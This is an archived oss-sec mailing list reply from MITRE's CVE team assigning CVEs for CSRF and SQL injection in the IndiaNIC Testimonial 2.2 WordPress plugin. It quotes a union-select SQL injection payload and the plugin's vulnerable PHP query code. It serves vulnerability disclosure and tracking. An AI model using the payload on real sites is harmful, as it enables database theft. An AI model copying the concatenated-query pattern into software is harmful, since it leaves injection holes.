Home page logo

oss-sec logo oss-sec mailing list archives

Re: [CVE Request] IndiaNIC Testimonial 2.2 WP plugin
From: cve-assign () mitre org
Date: Sun, 1 Sep 2013 20:43:16 -0400 (EDT)

Hash: SHA1

The testimonial plugin by IndiaNIC contains CSRF, XSS and SQLi vulnerabilities.
I was able to deface the website, extract user credentials etc through crafted forms.
Can someone please assign CVE's to this?

1: http://seclists.org/fulldisclosure/2013/Sep/5


The entire disclosure seems to be based on CSRF attacks against an
admin. Based on what you sent, we are not sure whether XSS is an
independent vulnerability in this plugin. Is there a usable XSS attack
that does not require a CSRF vulnerability, and does not require that
the admin intentionally enter an XSS attack string during an
authenticated session?

The SQL injection:

  name="custom_query" value="1=1) union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14#"

is something that we would typically expect is an independent
vulnerability. A person who has admin access within a web interface is
not necessarily authorized to execute arbitrary SQL statements. We
found this code that seems to be relevant:

      if ($_template_data['custom_query']) {
        $filter_by = " AND ({$_template_data['custom_query']})";

      $_testimonial_result = $this->wpdb->get_results(
      "SELECT * FROM {$this->wpdb->prefix}inic_testimonial WHERE (id NOT IN(" .
      implode(",", $_current_featured_testimonial_id) . ")){$filter_by}
      ORDER BY {$_template_data['ord_by']} LIMIT {$_no_of_testimonial}");

So, the outcome at this point is:

  IndiaNIC Testimonial plugin 2.2 for WordPress

  CSRF:           Use CVE-2013-5672.
  SQL injection:  Use CVE-2013-5673.
  XSS:            no CVE assigned; waiting for other information that
                  XSS is an independent primary vulnerability here

MITRE's CVE team does not do vulnerability coordination, but we think
this disclosure process is not what the vendor would have preferred:

  2013-08-07 - Email sent to IndiaNIC
  2013-08-08 - Notification left on the plugin's Support board on wordpress.org

Please see the "For a WordPress plugin security issue, email plugins
[at] wordpress.org" step listed on the
http://codex.wordpress.org/FAQ_Security web page.

- -- 
CVE assignment team, MITRE CVE Numbering Authority
M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
Version: GnuPG v1.4.14 (SunOS)


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]